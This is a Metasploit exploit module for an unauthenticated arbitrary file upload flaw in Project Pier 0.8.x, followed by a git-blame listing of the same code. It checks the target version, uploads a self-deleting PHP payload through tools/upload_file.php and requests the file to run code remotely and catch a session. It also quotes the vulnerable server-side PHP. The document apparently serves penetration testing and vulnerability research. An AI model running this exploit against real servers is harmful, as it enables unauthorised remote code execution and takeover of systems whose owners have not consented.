modules/exploits/unix/webapp/projectpier_upload_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Project Pier Arbitrary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Project Pier.  The application's
        uploading tool does not require any authentication, which allows a malicious user
        to upload an arbitrary file onto the web server, and then cause remote code
        execution by simply requesting it. This module is known to work against Apache
        servers due to the way it handles an extension name, but the vulnerability may
        not be exploitable on others.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'BlackHawk',
          'sinn3r'
        ],
      'References'     =>
        [
          ['OSVDB', '85881'],
          ['EDB', '21929'],
          ['PACKETSTORM', '117070']
        ],
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'DisclosureDate' => '2012-10-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])
      ])
  end


  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri'    => normalize_uri("#{base}/index.php"),
        'vars_get' =>
          {
            'c' => 'access',
            'a' => 'login'
          }
      })

    if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def upload_php(base, fname, php_payload, folder_name)
    data = Rex::MIME::Message.new
    data.add_part(folder_name, nil, nil, 'form-data; name="folder"')
    data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")
    data.add_part('', nil, nil, 'form-data; name="part"')
    data.add_part('Submit', nil, nil, 'form-data; name="submit"')

    post_data = data.to_s

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base}/tools/upload_file.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    return res.body if res
  end

  def exec_php(base, body)
    # Body example:
    # 0 ./upload/test/test.txt-0001
    uri = body.scan(/(\/.+$)/).flatten[0]

    res = send_request_raw({'uri' => "#{base}/tools#{uri}"})

    if res and res.code == 404
      print_error("The upload most likely failed")
      return
    end

    handler
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    # Don't create a directory on the target since it complicates
    # cleaning up after ourselves
    #folder_name = Rex::Text.rand_text_alpha(4)
    folder_name = ""
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"
    @clean_files = []

    p = get_write_exec_payload(:unlink_self=>true)

    print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")
    res = upload_php(base, php_fname, p, folder_name)

    if not res
      print_error("No response from server")
      return
    end

    print_status("Executing '#{php_fname}'...")
    exec_php(base, res)
  end
end

=begin
Relevant code from tools/upload_file.php

    $folder = rtrim( './upload/' . $_POST['folder'] , '/');
    mkdir($folder, 0777, true);

    $seq = str_pad((int) $_POST["part"],4,"0",STR_PAD_LEFT);
    move_uploaded_file($_FILES["file"]["tmp_name"],
    $folder . '/' . $_FILES["file"]["name"] . '-' . $seq );

Note that it stores the uploaded files in tools/upload/ not upload/

=end
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`include Msf::Exploit::Remote::HttpClient`
Add a mixin for uploading/executing bins with PHP 2012-10-12 02:57:41 -05:00			`include Msf::Exploit::PhpEXE`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Project Pier Arbitrary File Upload Vulnerability",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in Project Pier. The application's`
			`uploading tool does not require any authentication, which allows a malicious user`
			`to upload an arbitrary file onto the web server, and then cause remote code`
Oops, overwrote egypt's changes by accident 2012-10-11 16:40:52 -05:00			`execution by simply requesting it. This module is known to work against Apache`
			`servers due to the way it handles an extension name, but the vulnerability may`
			`not be exploitable on others.`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'BlackHawk',`
			`'sinn3r'`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '85881'],`
Update references 2012-12-10 11:42:21 -06:00			`['EDB', '21929'],`
Update msftidy to catch more potential URL vs PACKETSTORM warnings 2015-12-24 09:12:24 -08:00			`['PACKETSTORM', '117070']`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`],`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux php },`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`'Targets' =>`
			`[`
			`[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],`
			`[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]`
			`],`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-10-08',`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`def check`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`uri = normalize_uri(target_uri.path)`
			`uri << '/' if uri[-1,1] != '/'`
			`base = File.dirname("#{uri}.")`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`res = send_request_cgi(`
			`{`
			`'method' => 'GET',`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`'uri' => normalize_uri("#{base}/index.php"),`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`'vars_get' =>`
			`{`
			`'c' => 'access',`
			`'a' => 'login'`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/`
Saving progress 2014-01-21 13:03:36 -06:00			`return Exploit::CheckCode::Appears`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`def upload_php(base, fname, php_payload, folder_name)`
			`data = Rex::MIME::Message.new`
			`data.add_part(folder_name, nil, nil, 'form-data; name="folder"')`
			`data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")`
			`data.add_part('', nil, nil, 'form-data; name="part"')`
			`data.add_part('Submit', nil, nil, 'form-data; name="submit"')`
Retab modules 2013-08-30 16:28:54 -05:00
Fix MIME message to_s 2014-02-10 22:23:23 -06:00			`post_data = data.to_s`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{base}/tools/upload_file.php",`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'data' => post_data`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`return res.body if res`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`def exec_php(base, body)`
			`# Body example:`
			`# 0 ./upload/test/test.txt-0001`
			`uri = body.scan(/(\/.+$)/).flatten[0]`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`res = send_request_raw({'uri' => "#{base}/tools#{uri}"})`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`if res and res.code == 404`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_error("The upload most likely failed")`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`handler`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`def exploit`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`uri = normalize_uri(target_uri.path)`
			`uri << '/' if uri[-1,1] != '/'`
			`base = File.dirname("#{uri}.")`
Retab modules 2013-08-30 16:28:54 -05:00
Add a mixin for uploading/executing bins with PHP 2012-10-12 02:57:41 -05:00			`# Don't create a directory on the target since it complicates`
			`# cleaning up after ourselves`
			`#folder_name = Rex::Text.rand_text_alpha(4)`
			`folder_name = ""`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"`
Make cleanup work better 2012-10-11 16:39:54 -05:00			`@clean_files = []`
Retab modules 2013-08-30 16:28:54 -05:00
Add a mixin for uploading/executing bins with PHP 2012-10-12 02:57:41 -05:00			`p = get_write_exec_payload(:unlink_self=>true)`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`res = upload_php(base, php_fname, p, folder_name)`
Retab modules 2013-08-30 16:28:54 -05:00
Make sure res has value before passing it on to exec_php 2012-10-11 14:43:38 -05:00			`if not res`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_error("No response from server")`
Make sure res has value before passing it on to exec_php 2012-10-11 14:43:38 -05:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Executing '#{php_fname}'...")`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`exec_php(base, res)`
			`end`
			`end`
Add a mixin for uploading/executing bins with PHP 2012-10-12 02:57:41 -05:00
			`=begin`
			`Relevant code from tools/upload_file.php`

			`$folder = rtrim( './upload/' . $_POST['folder'] , '/');`
			`mkdir($folder, 0777, true);`

			`$seq = str_pad((int) $_POST["part"],4,"0",STR_PAD_LEFT);`
			`move_uploaded_file($_FILES["file"]["tmp_name"],`
			`$folder . '/' . $_FILES["file"]["name"] . '-' . $seq );`

			`Note that it stores the uploaded files in tools/upload/ not upload/`

			`=end`